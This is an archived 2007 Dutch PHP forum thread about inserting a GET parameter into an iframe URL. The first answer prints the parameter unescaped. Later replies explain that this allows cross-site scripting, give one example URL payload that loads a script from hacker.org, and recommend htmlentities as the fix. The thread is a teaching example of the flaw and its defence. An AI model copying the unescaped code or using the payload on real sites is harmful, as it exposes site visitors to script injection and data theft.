in een link een $... zetten [Archief]

Volledige versie bekijken : in een link een $... zetten

plietke

%Europe/Berlin %764 %2007, 19:20

heey allemaal

ik probeer een variable in de link te zetten maar der gaat op één of andere manier iets fout.
dit is wat ik heb:

$p= $_GET['p'];
print"$p";
print <<<ENDHTML
<iframe frameborder="1" scrolling="auto" src="'$p'.htm" name="tst" width=100% frameborder=1 height="350"></iframe>
ENDHTML;

wat klopt er niet want het nummer dat hij met print"" geeft klopt wel.

Koen!

%Europe/Berlin %808 %2007, 20:23

Geen wonder, de $p staat buiten de PHP. :)

Probeer dit eens:
$p= $_GET['p'];
echo "<iframe frameborder='1' scrolling='auto' src='" . $p . ".htm' name='tst' width=100% frameborder=1 height='350'></iframe>";

of:
$p= $_GET['p'];
print <<<ENDHTML
<iframe frameborder="1" scrolling="auto" src="
ENDHTML;
print $p;
print <<<ENDHTML
.htm" name="tst" width=100% frameborder=1 height="350"></iframe>
ENDHTML;

(de 2e weet ik niet zeker, want ik hebt ENDHTML nog nooit gebruikt)

plietke

%Europe/Berlin %848 %2007, 21:21

bedankt het is gelukt

brossiekoppie

%Europe/Berlin %024 %2007, 01:34

Dat is een van de grootste fouten die je kan maken. Je webpagina is zo helemaal klaar voor XSS!

Laiverd

%Europe/Berlin %347 %2007, 09:20

Dat is een van de grootste fouten die je kan maken. Je webpagina is zo helemaal klaar voor XSS!Omdat het blijkbaar iets teveel moeite is om dan even iets meer te zeggen, en er dan maar een lege zinloze post van te maken ... blijkbaar (ik heb niet goed naar het script gekeken, maar ga ervan uit dat brossiekoppie gelijk heeft), stel je je webpagina/site op deze manier bloot aan een relatief simpele hack die XSS (Cross Site Scripting) heet. Kort gezegd kan een hacker zich d.m.v. een stukje client side script gemakkelijk toegang verschaffen tot delen van een website waar ie normaal geen toegang toe zou hebben. Zie ook http://www.phpfreakz.nl/artikelen.php?aid=106 en verder http://www.google.nl/search?hl=nl&q=XSS+exploit+%2Bphp&meta=

John

brossiekoppie

%Europe/Berlin %448 %2007, 11:46

Oké ja, dat is inderdaad redelijk kort door de bocht maar ik ga ervan uit dat iedereen google kent. In ieder geval mijn excuses voor zo'n zinloze post. ;)

Om de uitleg een beetje kracht bij te zetten:

Stel nu dat je dit soort script hebt:

<?php
// hier je html
echo $_GET['i'];
// hier nog html
?>

en dus bvb mijnpagina.php?i=gebruikersnaam

Stel nu dat ik dit doe:
mijnpagina.php?i=%3CSCRIPT%20a=%22%3E%22%20SRC=%22 http://hacker.org/xss.js%22%3E%3C/SCRIPT%3E

En ik laat iemand anders op deze link klikken kan ik heel wat kostbare informatie van hem stelen.

Hoe oplossen? Omzetten naar html!

vb...

<?php
echo htmlentities($_GET['i']); // geen gevaar!
?>

plietke

%Europe/Berlin %710 %2007, 18:02

oke bedankt